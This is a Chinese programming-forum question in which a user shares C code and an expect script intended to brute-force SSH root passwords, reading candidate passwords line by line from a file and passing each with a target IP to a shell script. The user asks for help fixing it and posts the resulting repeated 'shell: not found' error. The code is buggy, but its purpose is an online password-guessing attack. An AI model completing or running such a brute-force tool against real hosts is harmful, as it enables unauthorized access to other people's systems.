hht769089161 2015-07-31 06:30 采纳率: 14.3%
浏览 1730

大家帮我看一下,这个在C语言里调用shell的对嘛,谢谢

#include
#include
int main(int argc,char**argv){
FILE* fp=NULL;
fp=fopen("passwd.txt","r");
char buff[20];
int i;
for(i=0;;i++){
memset(buff,0,sizeof(buff));

            if(fp==NULL)
                    break;

            fgets(buff,20,fp);
            printf("%s",buff);
            char shell[200];
            sprintf(shell,"/home/hht/workspeace/work1/ssh.sh %s %s",argv[1],buff);
            system("shell");
                    }

}
我想实现一个暴力破解ssh的小程序,但是完全不会shell,也只能硬着头皮用了,上面的C部分我想把passwd上的每一行代码fgets出来,然后连带ip作为参数传进shell里面,可能是在system调用shell的时候出的问题,当然也可能所有都有问题。

下面是shell的代码
#!/usr/bin/expect -f
set passwd $2
#密码
set host $1
#目标主机地址
set name root
#用户名

spawn ssh $host -l $name
expect "root@$host’s password:"
send "$passwd\r"

send"uname\n"
expect"LINUX"
send_user"success"

expect"Permission denied,please try again."
send_user"wrongnumber"
~

用expect这样可以吗,谢谢大家

  • 写回答

3条回答 默认 最新

  • hht769089161 2015-07-31 06:57
    关注

    错误是无限的
    sh: 1: shell: not found
    sh: 1: shell: not found
    sh: 1: shell: not found
    sh: 1: shell: not found
    sh: 1: shell: not found
    sh: 1: shell: not found
    sh: 1: shell: not found
    sh: 1: shell: not found
    sh: 1: shell: not found

    评论

报告相同问题?

悬赏问题

  • ¥15 素材场景中光线烘焙后灯光失效
  • ¥15 请教一下各位,为什么我这个没有实现模拟点击
  • ¥15 执行 virtuoso 命令后,界面没有,cadence 启动不起来
  • ¥50 comfyui下连接animatediff节点生成视频质量非常差的原因
  • ¥20 有关区间dp的问题求解
  • ¥15 多电路系统共用电源的串扰问题
  • ¥15 slam rangenet++配置
  • ¥15 有没有研究水声通信方面的帮我改俩matlab代码
  • ¥15 ubuntu子系统密码忘记
  • ¥15 保护模式-系统加载-段寄存器